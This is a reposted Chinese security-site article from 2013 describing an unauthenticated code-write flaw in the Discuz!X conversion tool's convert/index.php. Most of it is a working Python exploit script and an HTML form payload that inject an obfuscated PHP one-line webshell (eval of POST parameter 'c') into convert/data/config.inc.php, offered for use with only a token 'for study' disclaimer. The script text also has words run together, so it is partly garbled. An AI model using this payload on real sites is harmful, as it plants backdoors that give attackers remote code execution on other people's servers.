欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

Discuz!x系列转换工具任意代码写入漏洞

来源:本站转载 作者:佚名 时间:2013-12-24 TAG: 我要投稿

 Discuz!x系列转换工具存在任意代码写入漏洞,wooyun上猪猪侠和另外一大神刷rank也刷的差不多了,今天知道有童鞋已经公布了!

so,放出之前学习python写的漏洞利用exp, 只是练手学python,所以代码和功能都很粗糙。不知道漏洞作者是谁,看到此文的请留言认领!

这个漏洞主要是由该转换工具convert/index.php在接收表单的时候貌似没有做任何权限验证,不管提交啥都可以写入到convert/data/config.inc.php文件中,所以可以构造表单,来写入一句话。 exp主要功能实际只是post提交数据,贴上代码:

#coding=utf-8
#Nx4dm1n 2013-12
importhttplib, urllib
defdzconvertexp(url,vulfile):
    allvulfile=vulfile+'convert/index.php'
    target='http://'+url+vulfile
    page=urllib.urlopen(target)
    html=page.read()
    httpresponse=page.getcode()
    ifhttpresponse==200:
        httpClient=None
        try:
            params='a=config&source=d7.2_x2.0&submit=yes&newconfig%5Bsource%5D%5Bdbhost%5D
=localhost&newconfig%5Baaa%0D%0A%0D%0Aeval%28CHR%28101%29.CHR%28118%29.CHR%2897%29.CHR%28108%29.CHR%2840%29
.CHR%2834%29.CHR%2836%29.CHR%2895%29.CHR%2880%29.CHR%2879%29.CHR%2883%29.CHR%2884%29.CHR%2891%29.CHR%2899%29
.CHR%2893%29.CHR%2859%29.CHR%2834%29.CHR%2841%29.CHR%2859%29%29%3B%2F%2F%5D=localhost'
            printparams
            headers={"Content-type":"application/x-www-form-urlencoded","Accept":"text/html"}
 
            httpClient=httplib.HTTPConnection(url,80, timeout=10)
            httpClient.request("POST",allvulfile, params, headers)
            response=httpClient.getresponse()
            printresponse.getheaders()
        exceptException, e:
            printe
        finally:
            ifhttpClient:
                httpClient.close()
    else:
        print'no'
 
#输入目标url和convert的目录,常见的是/utility/目录,或者就直接是在根目录下
url=raw_input('Input url(No http):')
dirm=raw_input('Input the convert directory(ex:/utility/):')
dzconvertexp(url,dirm)

Post data中有一段经过url编码处理的代码,是一句话,密码是c. 如果是直接修改表单的话就不需要url编码了,只需要用php chr()函数处理过的一句话就可以了。也贴上用input表单代码:

<input type="text" name="newconfig[aaa eval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36)
.CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]"
 size="40" value="localhost" />

 提交成功之后一句话成功写入到convert/data/config.inc.php文件。

文章中提供的程序仅供学习交流使用…………^_^  感谢大尖刀童鞋对漏洞的分享,作者可能就是大尖刀的? or 猪猪侠! 一起感谢了!

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载